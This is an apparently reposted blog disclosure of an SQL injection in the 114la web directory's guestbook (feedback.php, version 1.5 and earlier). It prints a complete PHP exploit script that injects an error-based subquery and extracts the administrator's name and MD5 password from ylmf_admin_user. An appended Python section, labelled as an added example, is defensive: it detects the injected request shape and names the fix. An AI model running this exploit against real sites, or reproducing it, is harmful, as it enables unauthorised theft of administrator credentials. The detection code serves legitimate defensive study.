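114la Web Directory Guestbook Injection Vulnerability
The feedback (guestbook) file of the 114la web directory program from YLMF (雨林木风) has an injection vulnerability. Using the EXP, an attacker can obtain the administrator account and MD5 password.
Version: <=1.5
The EXP is as follows: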
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02

Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
    print_r($sbcopyright);
    die();
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
// Form body: the injected subquery is carried in the email field
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url/#M\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAONrn\r\n\r\n");
fwrite($sock, $data);
// Read the response headers, then the body
$headers = "";
while ($str = trim(fgets($sock, 4096)))
    $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
    $body .= fgets($sock, 4096);
fclose($sock);
// The MySQL "Duplicate entry" error text carries name_password
if (strpos($body, 'Duplicate entry') !== false) {
    preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
    $result=explode("_",$arr[1]);
    print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\nGood Luck!");
}else{
    print_r("Exploit Failed! \n");
}
ob_end_flush();
?>
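A defensive check built from the request shape above, as an added example that is not part of the original post: it flags POST bodies sent to feedback.php whose form fields carry several error-based SQL injection markers, and responses that leak the "Duplicate entry" error the EXP parses. The marker set, the threshold and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

ENDPOINT = "/feedback/feedback.php"  # path the EXP on this page posts to
# Assumed marker set, derived from the payload shape shown on this page.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "info_schema": re.compile(r"information_schema", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "admin_table": re.compile(r"ylmf_admin_user", re.I),
}
THRESHOLD = 2  # assumption: two or more markers in one field is suspicious

def inspect_request(path, body):
    """Return {field: [marker names]} for form fields that look injected."""
    if not path.lower().endswith(ENDPOINT):
        return {}
    flagged = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        hits = sorted(n for n, rx in MARKERS.items() if rx.search(value))
        if len(hits) >= THRESHOLD:
            flagged[field] = hits
    return flagged

def response_leaks_sql_error(body):
    """True when a response exposes the MySQL error text the EXP looks for."""
    return "Duplicate entry" in body

# Request body with the shape of the one on this page (content field shortened).
EXPLOIT_SHAPED_BODY = (
    "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),"
    "concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),"
    "floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#"
    "&content=test"
)
# Constructed benign submission: one marker only, so it stays under the threshold.
BENIGN_BODY = "username=alice&email=alice%40example.com&content=Please+group+by+category"

if __name__ == "__main__":
    print(inspect_request("/feedback/feedback.php", EXPLOIT_SHAPED_BODY))
    print(inspect_request("/feedback/feedback.php", BENIGN_BODY))
```

Matching on request bodies only narrows triage; the underlying defect is removed by binding the feedback fields as query parameters and by not returning database errors to the client.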
When reposting, please credit WebShell'S Blog. Address of this article: https://www.webshell.cc/1059.html